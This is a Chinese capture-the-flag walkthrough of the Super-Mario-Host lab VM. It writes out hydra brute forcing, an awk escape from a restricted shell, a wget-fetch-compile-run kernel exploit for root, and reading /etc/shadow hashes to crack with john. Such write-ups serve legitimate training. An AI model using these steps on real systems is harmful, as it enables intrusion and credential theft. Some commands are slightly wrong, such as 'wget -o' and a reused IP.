Super-Mario-Host(超级玛丽)靶机
仅供个人娱乐
靶机百度云下载 链接:https://pan.baidu.com/s/13l1FUgJjXArfoTOfcmPsbA 提取码:a8ox
一、主机发现
arp-scan -l
![](https://upload-images.jianshu.io/upload_images/4664072-8760f765e49368fb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
二、漏洞扫描
扫描端口
![](https://upload-images.jianshu.io/upload_images/4664072-1f045502e8224b92.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
扫描网站目录
御剑或者dirb http://192.168.85.144:8180 /usr/share/dirb/wordlists/big.txt
![](https://upload-images.jianshu.io/upload_images/4664072-8a776ebf09be9b33.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-fd3cf822e0386dde.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
三、漏洞发现与利用
发现http://192.168.85.144:8180/vhosts
![](https://upload-images.jianshu.io/upload_images/4664072-94573875fd0b7997.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
1.添加日志记录
![](https://upload-images.jianshu.io/upload_images/4664072-f5574987e7919e27.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
在本地hosts文件添加解析记录
![](https://upload-images.jianshu.io/upload_images/4664072-975a8ce9deca68e6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-460db1e32ae64a18.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
4. 浏览器访问http://mario.supermariohost.local:8180/,别的什么都没有
![](https://upload-images.jianshu.io/upload_images/4664072-3b8de56b2f769e72.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
5. 扫描目录,扫描出来如下目录
![](https://upload-images.jianshu.io/upload_images/4664072-dfc597fb1f6b1915.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-2bc93305302b21c8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Dirbuster
![](https://upload-images.jianshu.io/upload_images/4664072-a1994ac1b7878ba7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
5.发现http://mario.supermariohost.local:8180/luigi.php
![](https://upload-images.jianshu.io/upload_images/4664072-92f0bd6f22543b94.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
6. 发现http://mario.supermariohost.local:8180/command.php测试luigi,发现存在
![](https://upload-images.jianshu.io/upload_images/4664072-4095fc67941861e8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
2.使用cewl爬取和john解密
使用cewl爬取站点下的可疑用户名作为用户名字典
john在该user的基础上生成相应社工密码进行爆破(不一定成功)
cewl http://mario.supermariohost.local:8180/ -w /root/user.txt
john --wordlist=user.txt --rules > passwd.txt
![](https://upload-images.jianshu.io/upload_images/4664072-e7f1d42f47fe9e12.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-834f087ae55dad1e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-d798a86355cb5d83.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
失败
使用hydra
![](https://upload-images.jianshu.io/upload_images/4664072-3c8f894be82c815e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-672980c492c5b6f0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
登录成功,但是限制的shell交互
这个受限制的shell,想到之前的rbash提权操作,正好这里也能用vim命令,但并不能绕过成功 help查看靶机能够使用的命令
![](https://upload-images.jianshu.io/upload_images/4664072-9e569c909907cecc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
发现能使用awk命令,查阅资料,发现 awk调用shell命令有两种方法:system与print
3.调用awk产生交互式shell
尝试切换到正常的bash: awk 'BEGIN{system("/bin/bash")}’
![](https://upload-images.jianshu.io/upload_images/4664072-cf2124087d0beba7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
绕过成功后,查看靶机版本信息,好老的版本,目测应该有漏洞
上kali 中search一下
4.漏洞提权
![](https://upload-images.jianshu.io/upload_images/4664072-2e4b7059f9652ec3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
searchsploit 3.13.0
![](https://upload-images.jianshu.io/upload_images/4664072-e5ba58a268b85576.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
直接kali开放apache,
![](https://upload-images.jianshu.io/upload_images/4664072-8a0a0c128644aae6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-45380e514eafbe8c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
靶机wget就ok
wget http://192.168.85.144/37292.c -o /tmp/37292.c
![](https://upload-images.jianshu.io/upload_images/4664072-c886ee4ff19445ce.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
将该.c文件进行gcc编译后执行
gcc 37292.c -o rootshell
![](https://upload-images.jianshu.io/upload_images/4664072-00d779ceb55c6769.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
执行 ./rootshell
![](https://upload-images.jianshu.io/upload_images/4664072-6b115ee5dff91436.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
成功拿到root权限
用python切一下shell
python -c 'import pty;pty.spawn("/bin/bash")'
cd /
cd root
ls
进入root目录,发现一个flag.zip的压缩文件
![](https://upload-images.jianshu.io/upload_images/4664072-550c33093fa1b859.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
也是经过加密的压缩
![](https://upload-images.jianshu.io/upload_images/4664072-f31316663313adae.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
直接wget到kali进行爆破吧
![](https://upload-images.jianshu.io/upload_images/4664072-177b93120d6b328e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
wget http://192.168.85.144:8180/flag.zip
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u flag.zip
![](https://upload-images.jianshu.io/upload_images/4664072-380795ea9683b332.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-3ec8ea72c3a188d0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
爆破成功,密码为:ilovepeach
![](https://upload-images.jianshu.io/upload_images/4664072-83e1cc37d2d57bea.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
6.get flag
靶机作者的用意是要拿到靶机上所用用户的明文密码
在靶机中,查看etc下的shadow
![](https://upload-images.jianshu.io/upload_images/4664072-6ead812e2847294a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
共有
root:$6$ZmdseK46$FTvRqEZXdr3DCX2Vd6CXWmWAOJYIjcAI6XQathO3/wgvHEoyeP6DwL3NHZy903HXQ/F2uXiTXrhETX19/txbA1:17248:0:99999:7:::
mario:$6$WG.vWiw8$OhoMhuAHSqPYTu1wCEWNc4xoUyX6U/TrLlK.xyhRKZB3SyCtxMDSoQ6vioNvpNOu78kQVTbwTcHPQMIDM2CSJ.:17248:0:99999:7:::
luigi:$6$kAYr2OVy$1qBRKJIWqkpNohmMIP3r3H3yPDQ9UfUBcO4pahlXf6QfnqgW/XpKYlQD4jN6Cfn.3wKCWoM7gPbdIbnShFJD40:17233:0:99999:7:::
直接拿去kali进行john解
7.John解密hash
john --wordlist=/usr/share/wordlists/rockyou.txt shadow.txt
实验失败举例
./unshadow /etc/passwd /etc/shadow > passwoed.txt #将shadow文件导入passwoed.txt,也可以直接复制shadow文件中所有字段或第2个字段
./john password.txt #对散列值进行破解
cat john.pot #查看破解结果
![](https://upload-images.jianshu.io/upload_images/4664072-0f929faefa786c45.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)